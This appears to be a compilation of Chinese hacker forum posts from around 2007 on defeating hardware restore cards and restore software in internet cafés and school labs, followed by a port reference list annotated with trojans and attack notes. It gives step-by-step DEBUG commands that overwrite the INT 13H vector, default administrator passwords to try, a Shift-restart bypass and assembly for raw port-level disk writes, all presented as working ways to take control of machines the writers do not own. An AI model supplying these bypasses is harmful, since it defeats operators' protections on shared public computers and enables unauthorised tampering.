取破解办法,相信代理商会有可靠的办法让你满意的。(这又叫做社会工程学入侵)我
在使用U盘(USB闪存盘)如图1-13-12 的时候发现了另外一个绕过还原卡保护功能的方
法。当U盘接在计算机上时,被识别成“移动硬盘”,如图1-13-13 还原卡是不保护这
上面的数据的,我们可以任意的修改U盘中的数据。【小知识:使用USB接口的活动硬盘
如图1-13-14 也可以突破还原卡保护,我们把QQ聊天记录存放在活动硬盘上,以后到哪
家网吧都不会忘记和MM说过的每一句话了;我们把收集的黑客工具拷贝到活动硬盘,网
吧的计算机可能没有软驱、光驱,但主板一般是有USB接口的,这些工具就可以照旧使
用!】 还原卡提供保护功能的是卡上面的那块硬件芯片中保存的小程序,它和硬盘的
主引导记录MBR协同工作,将系统中断Int13H 【小知识:进制:H代表16进制,以十六
为基数,有十六个符号0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F表示,逢十
六进一。Q代表8进制,以八为基数,有八个符号0,1,2,3,4,5,6,7表示,逢八进
一。B以二为基数,有两个符号0,1表示,逢二进一。中断:程序运行过程中出现了某
种紧急事件,必须中指现行程序而去转去执行一个处理该事件的程序,处理完成该事件
后再恢复并继续运行原有的程序,这个过程称作中断。中断向量表:中断服务程序的起
始地址称为中断入口,将中断程序的入口地址放在一起就组成中断向量表。】进行底层
拦截,这样WIN98引导后使用的就是由还原卡修改过的中断了。想破解还原卡的保护功
能,只要恢复Int13H的BIOS中断向量就可以了,简单过程就是:找到Int13H的原始BIOS
中断向量值,填入中断向量表 【补充知识:DEBUG命令简单解释:】 命令用途格式 汇
编汇编语句A[address] 显示显示内存D[address] 修改修改内存E address [lise] 执
行用任选断点执行G[=address] [address…] 传送传送内存块内容M range address 终
止退出DEBUGQ 输出发送输出的字节O portaddress byte 寄存器显示寄存器/标示R
[register name] 检索检索字符S rang list 跟踪执行并显示T [=address][value] 在
DOS下运行DEBUG程序: Debug -a 100 -xor ax,ax -int 13 -int3 然后输入T回车,并
不断的重复,直到显示的地址如F000:xxxx。记下这个地址,按Q键回车退出。这里假设
出现的第一个F000:1234就是要使用的。实际可能是在第2、3、4个才出现,通常认为就
是第一个,在(0:13H*4)=0:4cH处填入这个地址,运行Debug,输入如下命令 -e
0:4c34 12 00 f0 -q 如果在跟踪过程中发现了如下代码:CMP DL,80(判断是否操作
硬盘),可以修改成不存在的硬盘号如:CMP DL,FF,然后试试硬盘可写吗?可写的话
就OK了。 现在有些较新的还原卡经过上述操作,还是不能写盘,出现操作死机的情
况。一般是因为Int8H、Int1CH、Int15H等中断对Int13H进行了向量保护。想办法将这
些中断修改为原始中断入口地址就可以了。如果想获得还原卡管理员密码的话,因为有
些还原卡的密码是存放在硬盘上某个空闲磁盘空间中的,与还原卡无关,我考虑了以下
几个步骤: 1.恢复系统中断向量并读取磁盘的MBR记录信息 2.分析MBR,这里建议结合
磁盘在安装还原卡前后各扇区数据变化情况 3.找到密码存放扇区并破解其加密算法不
过我感觉这实在是太深奥了,不是我这种笨脑瓜想明白的,就此作罢了。 网管:要注
意还原卡的安全问题,使用了还原卡固然可以减轻计算机系统维护的工作量,但是使用
还原卡的计算机并不是安全得像进了保险箱,针对还原卡的保护和破解,就像矛与盾之
争一样。一方面不断有新的破解技术出现,另一方面也不断的有抵御破解手段的新的还
原卡生产出来。想更好的保护好计算机,那就只有不断的更新手中还原卡的版本,同时
,禁止用户进入DOS模式或者干脆删除DEBUG命令也是一个折中的办法。 学生: 还原精
灵的破解 我今天到另外的一家网吧上网,发现他们的硬盘也是受“还原卡”保护的,
重启计算机一切修改都还原了,破解它这还不好办!我的眼睛就不住地往桌下没扣盖的
主机上打量。却看见这些计算机并没有安装什么插卡,真让我大吃一惊,莫非是用什么
软保护措施?还真让我猜中了。看 就是这个叫“还原精灵”的软件在捣鬼。我想删除
“还原精灵”,在“添加删除程序”中找不到这款软件,在硬盘上也查找不到这款软件
的安装文件。右击任务栏右下角的图标,却被要求输入操作密码。 看来想办法破解此
软件的密码,是控制这台计算机的关键。如果仅仅是因为安装了一个新程序,提示要求
重启计算机,那就不要点击“确定”(,选择“以后重启”。在“开始>关闭系统”选
择“重新启动计算机” 注意此时一定要按住键盘shift按键不放,这样计算机将跳过初
始化等操作,直接重新加载系统程序,从而绕过了还原精灵的保护。【以下为cy07添加
】如果想长期保存自己的文件,就必须卸掉还原精灵或者取得还原精灵的管理员密码,
要卸掉还原精灵其实不难,网上有专门清除还原精灵的程序, 可以到它的老家 http://cy07.126.com下载,运行以后直接清除,就可以清除还原精灵了,不过需要注
意,由于还原精灵是在硬盘最重要的主引导记录MBR( 来自网络!)
关于破解还原卡(通用) 请大家先看看后面的(可以穿透还原卡和还原软件的代码)
方法一:
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了 还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置. 关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索QQ:9750406 关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落 一般可以找到默认密码的.
而一般机房管理员是不会修改其默认密码的,比如俺学校的
台湾远志牌的还原卡的默认密码是12345678,
小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!!
不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的,
恶意破坏计算机就是对自己的不尊重!!!!
如果管理员把密码改了呢?那就拿出宝刀---
方法二:
此法实施过程看起来挺麻烦,不过熟悉了*作起来超不过15秒的-
高手sinister曰:
其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
当你AH=2的时,它便会call原始INT 13地址来完成*作.
只要找到原始INT 13入口便可以为所欲为.
不知看了这段感觉如何?慢慢消化吧.
主要矛盾:关键是要找到原始的int 13入口.
测试*作系统:win98
测试对象: 台湾远志还原卡
测试地点: 学校机房
测试目的: 控制还原卡,但不破坏.
注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\debug,
- a100
- xor ax,ax
- int 13
- int3
; 寻找原始的int 13入口.
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注: 填的时候要仔细,填错的话会死机。ok,破解完成.
这时在提示符c:\键入
c:\win
进入win98系统即可,那么这次你在win98系统中的一切*作,随着下一次
的启动都会被还原卡存储起来。
不过下一次进入系统的的时候,你还是需要重写地址0:4c,才可以让还原卡存储你的东东。
这时只需要在纯dos下进入debug,键入
-e 0:4c 95 9A 00 F0
-q 即可。
哈哈。。。这样也挺好,只有你才是这台computer的真正的主人 -。
别人还是受还原卡的限制的except--you 。
下面是找Int13入口的方法,我常用的几种:
1。手工运行Debug,最好在纯DOS下:
Debug
- a100
- xor ax,ax 注意: 前面要加上功能号以选择Int13H内部的流程,避免进入其他不经过原始入口的流程
- int 13
- int3
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx。记下这一地址,按q 回车退出。
这里假设了第一个F000:xxxx就是要找的入口,实际上可以在第2,3,4,。。。。出现,要自己判断一下,通常认为就是第一个。在(0:13H*4)=0:4cH 处填入这个地址。
例如得到的地址是F000:1234
运行debug
-e 0:4c 34 12 00 F0 =======>把得到的原始入口填入Int13H的中断向量表
-q
注意:
填的时候要仔细,填错的话会死机。有些经过针对性处理的机器,要进一步鉴别。
如在Int13内部调用Int1ch.
如果在trace过程中发现如下代码 CMP DL,80[意思是判断是否针对硬盘操作] ,可以尝试修改成不存在的硬盘号,比如改成CMP DL,FF。其他的都不要修改.
试试 硬盘可写吗?如果可以的话就万事大吉了。另外,不能在Windows的虚拟DOS窗口中使用这种方法。
如果在Windows的虚拟DOS窗口运行的话,请使用下一种方法。
2。Debug
- s F000:0 ffff 80 fa 80 强行搜索BIOS区,通过比较入口代码找到原始入口点
你可能会发现有好几处。根据我的多次破解经验,通常这个地址在F000:8000以后。
试验一下: 如果U F000:xxxx地址后发现代码类似 -u F000:xxxx
PUSHF
CMP DL,80
JZ ....
.
.
.
[有些不是这样,要注意鉴别。]
的话,填入向量表试试。通常破解就完成了。
我曾经发现经过以上中断还原后,仍不能写盘,或者死机的情况。经跟踪发现Int8H,Int 1CH,Int15H等向量对
Int13H进行了向量保护。解决办法:把Int8H,Int1cH,Int15H 也改会原始中断点(也是BIOS中断)。尝试写盘成功
如果想获得保护卡密码的话,可以参考以下步骤:
1。找到Int13h原始点设回中断向量表。
2。读出MBR
3,分析读出的MBR,找到密码算区和加密算法
4,推算出密码
可以穿透还原卡和还原软件的代码
一、虚拟还原技术的原理
本文所说的是一种普遍运用于还原卡或还原软件上的技术,当然,不同品牌不同厂商生产的可能不尽相同,但原理却是相通的。
首先,还原卡和还原软件会抢先夺取引导权,将原来的0头0道1扇保存在一个其他的扇区,(具体备份到那个扇区是不一定的),将自己的代码写入0头0道1扇,从而能在操作系统之前得到执行权,这一点类似于一个引导型病毒;然后,我们来看看虚拟还原技术在操作系统之前都做了些什么:
1.将中断向量表中的INT13H的入口地址保存;
2.把自己用于代替INT13H的代码写入内存,并记住入口地址,当然这种“写入内存”并不是普通的“写”,而是一种我们称为“常驻”的方法,有关“常驻程序”的实现方法我们不另外花篇幅来描述了,如果你还不了解的话请自己找有关资料,也可以www.hackart.orgwww.lsky.net找风般的男人交流;
3.将中断向量表中INT13H的入口地址改为这段常驻程序的入口地址。补充一点,虚拟还原程序在修改INT13H的入口后往往都会修改一些其他中断入口,当然也是通过常驻程序来实现的,这些中断用来实现对中断向量表中INT13H入口地址监控,一旦发现被修改,就马上把它改回,这样做同样是用来防止被有心人破解。
好了,你已经看出来了,这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键,那么这段代码到底实现了些什么了,以下是本人对此拙浅的理解:
1.拦截所有INT13H中对硬盘0头0道1扇的操作
这些包括读写操作,把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作,这样做的目的是保护虚拟还原代码不被破坏,并且不能被有心人读出进行破解,即使你用扇区编辑工具查看主引导区,实际上你看到的是这个备份的主引导区。
2.拦截所有INT13H中的写硬盘操作
这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作,和扩展INT13H中基于扇区地址方式的对大硬盘的写操作,甚至包括扩展INT13H中对一些非IDE接口的硬盘的写操作。
至于拦截后做什么是虚拟还原技术实现的关键,在早期的DOS系统当中完全可以“什么都不做”,也就是说当用户写硬盘时实际上是什么都没做,但现在的操作系统都要对硬盘进行一些必要的写操作,比如对虚拟内存的写操作。众所周知,虚拟内存实际上就是硬盘,而如果禁止操作系统写硬盘的话显然后果是不堪设想的。所以,大多数虚拟还原厂商用的方法是占用一些硬盘空间,把硬盘所进行的写操作做一个记录,等系统重新启动后还原这一记录,但是怎样科学记录硬盘的写操作,是我一直没想通的问题,这种“科学”应该体现在时间上和硬盘空间的占用量上的,也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键,如果有这方面想法的朋友欢迎和我交流;
3.备份端口70H,71H中的内容,并把最后一次执行时端口70H,71H的内容和备份的内容做比较,不一样就提示BIOS被修改,是否还原,并通过密码验证修改BIOS是否合法。
二、PC机的中断机制
中断提供了最基本的硬件和软件的接口,它使得程序员不必了解硬件系统的细节,只要直接调用系统提供的中断服务子程序,就可以完成相应功能,这样能使得程序设计更为方便。其实现机制如下:当某一中断源发出中断请求时,CPU能够决定是否响应这一中断请求(当CPU在执行更为重要的工作时,可以暂不响应),如果允许响应该中断,CPU会在现行的指令执行完后,把断点处的下一条指令地址和各寄存器的内容和标志位的状态,推入堆栈进行保护,然后转到中断源服务程序的入口,进行中断处理,当中断处理完成后,再恢复被保留的各寄存器、标志位状态和指令指针,使CPU返回断点,继续执行下一条指令。
为了区别各个中断,CPC系统给每个中断都分配了一个中断号N,比如INT 3H是断点中断,INT 10H是显示中断,我们今天要讨论的主要是INT 13H磁盘读写中断。
要说清楚PC机上的中断机制,用这一点篇幅是完全不够的,这里我所说的只是一个大概,如果你不清楚的话,请查阅一些资料或和我交流,我们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么?所谓BIOS中断简单说就是你机器上的BIOS提供的中断,那么在BIOS中断的后面,到底是些什么呢?实际上是一些对端口的输入输出操作,PC的每个端口都实现特定的功能,我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些端口进行操作,从而可以实现象调用BIOS中断一样的功能,但是一个前提是你必须对这些端口有详细的了解。反过来说,PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程,从这点看,中断有点象我们平时所说的“封装”,我不知道这样说对不对,但的确中断为我们“封装”了许多系统底层的细节。
三、硬盘读写端口的具体含义
对硬盘进行操作的常用端口是1f0h~1f7h号端口,各端口含义如下:
端口号 读还是写 具体含义
1F0H 读/写 用来传送读/写的数据(其内容是正在传输的一个字节的数据)
1F1H 读 用来读取错误码
1F2H 读/写 用来放入要读写的扇区数量
1F3H 读/写 用来放入要读写的扇区号码
1F4H 读/写 用来存放读写柱面的低8位字节
1F5H 读/写 用来存放读写柱面的高2位字节(其高6位恒为0)
1F6H 读/写 用来存放要读/写的磁盘号及磁头号
第7位 恒为1
第6位 恒为0
第5位 恒为1
第4位 为0代表第一块硬盘、为1代表第二块硬盘
第3~0位 用来存放要读/写的磁头号
1f7H 读 用来存放读操作后的状态
第7位 控制器忙碌
第6位 磁盘驱动器准备好了
第5位 写入错误
第4位 搜索完成
第3位 为1时扇区缓冲区没有准备好
第2位 是否正确读取磁盘数据
第1位 磁盘每转一周将此位设为1,
第0位 之前的命令因发生错误而结束
写 该位端口为命令端口,用来发出指定命令
为50h 格式化磁道
为20h 尝试读取扇区
为21h 无须验证扇区是否准备好而直接读扇区
为22h 尝试读取长扇区(用于早期的硬盘,每扇可能不是512字节,而是128字节到1024之间的值)
为23h 无须验证扇区是否准备好而直接读长扇区
为30h 尝试写扇区
为31h 无须验证扇区是否准备好而直接写扇区
为32h 尝试写长扇区
为33h 无须验证扇区是否准备好而直接写长扇区
注:当然看完这个表你会发现,这种读写端口的方法其实是基于磁头、柱面、扇区的硬盘读写方法,不过大于8G的硬盘的读写方法也是通过端口1F0H~1F7H来实现的^_^
四、一个通过对硬盘输入输出端口操作来读写硬盘的实例
让我们来看一个关于INT13H读写硬盘程序实例。在例子中详细说明了硬盘的读写操作所用到的端口,并且把通过INT13H读出的主引导区得到的数据和通过输入输出读主引导区得到的数据进行比较,从而证实这两种操作功能相同,程序片段如下:
mov dx,1f6h ; 要读入的磁盘号及磁头号
mov al,0a0h ;磁盘0,磁头0
out dx,al
mov dx,1f2h ;要读入的扇区数量
mov al,1 ;读一个扇区
out dx,al
mov dx,1f3h ;要读的扇区号
mov al,1 ;扇区号为1
out dx,al
mov dx,1f4h ;要读的柱面的低8位
mov al,0 ; 柱面低8位为0
out dx,al
mov dx,1f5h ; 柱面高2位
mov al,0 ; 柱面高2位为0(通过1F4H和1F5H端口我们可以确定
; 用来读的柱面号是0)
out dx,al
mov dx,1f7h ;命令端口
mov al,20h ; 尝试读取扇区
out dx,al
still_going:
in al,dx
test al,8 ;扇区缓冲是否准备好
jz still_going ;如果扇区缓冲没有准备好的话则跳转,直到准备好才向下执行。
mov cx,512/2 ;设置循环次数(512/2次)
mov di,offset buffer
mov dx,1f0h ;将要传输的一个字节的数据
rep insw ;传输数据
; ------
mov ax,201h ;以下是用INT13H读硬盘的0磁头、0柱面、1扇区
mov dx,80h
mov cx,1
mov bx,offset buffer2
int 13h
mov cx,512 ;以下部分用来比较2种方法读出的硬盘数据
mov si,offset buffer
mov di,offset buffer2
repe cmpsb
jne failure
mov ah,9
mov dx,offset readmsg
int 21h
jmp good_exit
failure:
mov ah,9
mov dx,offset failmsg
int 21h
good_exit: ;以下部分用来结束程序
mov ax,4c00h ;退出程序
int 21h
readmsg db 'The buffers match. Hard disk read using ports.$'
failmsg db 'The buffers do not match.$'
buffer db 512 dup ('V')
buffer2 db 512 dup ('L')
你可以对照硬盘读写端口含义表,再好好看看上面的例子,你将会对硬盘读写端口有一个比较深的理解。好了,到了该把谜底揭晓的时候了,重新回到我们的主题。正如你现在想象的,这种可以穿透还原卡或是还原软件保护的代码的确是对硬盘读写端口的输入输出操作。现在,我们已经可以从原理上理解了,还原卡拦 |
2007-04-23 03:43
2007-04-23 03:41
一 、 端口大全
端口:0
服务:Reserved
说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
端口:1
服务:tcpmux
说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:21
服务:FTP
说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。
端口:22
服务:Ssh
说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。
端口:23
服务:Telnet
说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。
端口:25
服务:SMTP
说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。
端口:31
服务:MSG Authentication
说明:木马Master Paradise、Hackers Paradise开放此端口。
端口:42
服务:WINS Replication
说明:WINS复制
端口:53
服务:Domain Name Server(DNS)
说明:DNS服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其他的通信。因此_blank">防火墙常常过滤或记录此端口。
端口:67
服务:Bootstrap Protocol Server
说明:通过DSL和Cable modem的_blank">防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。 HACKER常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。客户端向68端口广播请求配置,服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
端口:69
服务:Trival File Transfer
说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。
端口:79
服务:Finger Server
说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其他机器Finger扫描。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:Metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
说明:消息传输代理。
端口:109
服务:Post Office Protocol -Version3
说明:POP3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。
端口:110
服务:SUN公司的RPC服务所有端口
说明:常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等
端口:113
服务:Authentication Service
说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过_blank">防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在_blank">防火墙另一边与E-MAIL服务器的缓慢连接。许多_blank">防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。
端口:119
服务:Network News Transfer Protocol
说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。
端口:135
服务:Location Service
说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗?什么版本?还有些DOS攻击直接针对这个端口。
端口:137、138、139
服务:NETBIOS Name Service
说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。
端口:143
服务:Interim Mail Access Protocol v2
说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。
端口:161
服务:SNMP
说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在 Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。
端口:177
服务:X Display Manager Control Protocol
说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。
端口:389
服务:LDAP、ILS
说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
端口:443
服务:Https
说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。
端口:456
服务:[NULL]
说明:木马HACKERS PARADISE开放此端口。
端口:513
服务:Login,remote login
说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。
端口:544
服务:[NULL]
说明:kerberos kshell
端口:548
服务:Macintosh,File Services(AFP/IP)
说明:Macintosh,文件服务。
端口:553
服务:CORBA IIOP (UDP)
说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。
端口:555
服务:DSF
说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。
端口:568
服务:Membership DPA
说明:成员资格 DPA。
端口:569
服务:Membership MSN
说明:成员资格 MSN。
端口:635
服务:mountd
说明:Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于 2049端口。
端口:636
服务:LDAP
说明:SSL(Secure Sockets layer)
端口:666
服务:Doom Id Software
说明:木马Attack FTP、Satanz Backdoor开放此端口
端口:993
服务:IMAP
说明:SSL(Secure Sockets layer)
端口:1001、1011
服务:[NULL]
说明:木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。
端口:1024
服务:Reserved
说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器,打开Telnet,再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。
端口:1025、1033
服务:1025:network blackjack 1033:[NULL]
说明:木马netspy开放这2个端口。
端口:1080
服务:SOCKS
说明:这一协议以通道方式穿过_blank">防火墙,允许_blank">防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置,它会允许位于_blank">防火墙外部的攻击穿过 _blank">防火墙。WinGate常会发生这种错误,在加入IRC聊天室时常会看到这种情况。
端口:1170
服务:[NULL]
说明:木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。
端口:1234、1243、6711、6776
服务:[NULL]
说明:木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。
端口:1245
服务:[NULL]
说明:木马Vodoo开放此端口。
端口:1433
服务:SQL
说明:Microsoft的SQL服务开放的端口。
端口:1492
服务:stone-design-1
说明:木马FTP99CMP开放此端口。
端口:1500
服务:RPC client fixed port session queries
说明:RPC客户固定端口会话查询
端口:1503
服务:NetMeeting T.120
说明:NetMeeting T.120
端口:1524
服务:ingress
说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了 _blank">防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个 SHELL。连接到600/pcserver也存在这个问题。
端口:1600
服务:issd
说明:木马Shivka-Burka开放此端口。
端口:1720
服务:NetMeeting
说明:NetMeeting H.233 call Setup。
端口:1731
服务:NetMeeting Audio Call Control
说明:NetMeeting音频调用控制。
端口:1807
服务:[NULL]
说明:木马SpySender开放此端口。
端口:1981
服务:[NULL]
说明:木马ShockRave开放此端口。
端口:1999
服务:cisco identification port
说明:木马BackDoor开放此端口。
端口:2000
服务:[NULL]
说明:木马GirlFriend 1.3、Millenium 1.0开放此端口。
端口:2001
服务:[NULL]
说明:木马Millenium 1.0、Trojan Cow开放此端口。
端口:2023
服务:xinuexpansion 4
说明:木马Pass Ripper开放此端口。
端口:2049
服务:NFS
说明:NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。
端口:2115
服务:[NULL]
说明:木马Bugs开放此端口。
端口:2140、3150
服务:[NULL]
说明:木马Deep Throat 1.0/3.0开放此端口。
端口:2500
服务:RPC client using a fixed port session replication
说明:应用固定端口会话复制的RPC客户
端口:2583
服务:[NULL]
说明:木马Wincrash 2.0开放此端口。
端口:2801
服务:[NULL]
说明:木马Phineas Phucker开放此端口。
端口:3024、4092
服务:[NULL]
说明:木马WinCrash开放此端口。
端口:3128
服务:squid
说明:这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、 8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。
端口:3129
服务:[NULL]
说明:木马Master Paradise开放此端口。
端口:3150
服务:[NULL]
说明:木马The Invasor开放此端口。
端口:3210、4321
服务:[NULL]
说明:木马SchoolBus开放此端口
端口:3333
服务:dec-notes
说明:木马Prosiak开放此端口
端口:3389
服务:超级终端
说明:WINDOWS 2000终端开放此端口。
端口:3700
服务:[NULL]
说明:木马Portal of Doom开放此端口
端口:3996、4060
服务:[NULL]
说明:木马RemoteAnything开放此端口
端口:4000
服务:QQ客户端
说明:腾讯QQ客户端开放此端口。
端口:4092
服务:[NULL]
说明:木马WinCrash开放此端口。
端口:4590
服务:[NULL]
说明:木马ICQTrojan开放此端口。
端口:5000、5001、5321、50505
服务:[NULL]
说明:木马blazer5开放5000端口。木马Sockets de Troie开放5000、5001、5321、50505端口。
端口:5400、5401、5402
服务:[NULL]
说明:木马Blade Runner开放此端口。
端口:5550
服务:[NULL]
说明:木马xtcp开放此端口。
端口:5569
服务:[NULL]
说明:木马Robo-Hack开放此端口。
端口:5632
服务:pcAnywere
说明:有时会看到很多这个端口的扫描,这依赖于用户所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能的代理(这里的代理是指agent而不是proxy)。入侵者也会寻找开放这种服务的计算机。,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。
端口:5742
服务:[NULL]
说明:木马WinCrash1.03开放此端口。
端口:6267
服务:[NULL]
说明:木马广外女生开放此端口。
端口:6400
服务:[NULL]
说明:木马The tHing开放此端口。
端口:6670、6671
服务:[NULL]
说明:木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。
端口:6883
服务:[NULL]
说明:木马DeltaSource开放此端口。
端口:6969
服务:[NULL]
说明:木马Gatecrasher、Priority开放此端口。
端口:6970
服务:RealAudio
说明:RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。
端口:7000
服务:[NULL]
说明:木马Remote Grab开放此端口。
端口:7300、7301、7306、7307、7308
服务:[NULL]
说明:木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。
端口:7323
服务:[NULL]
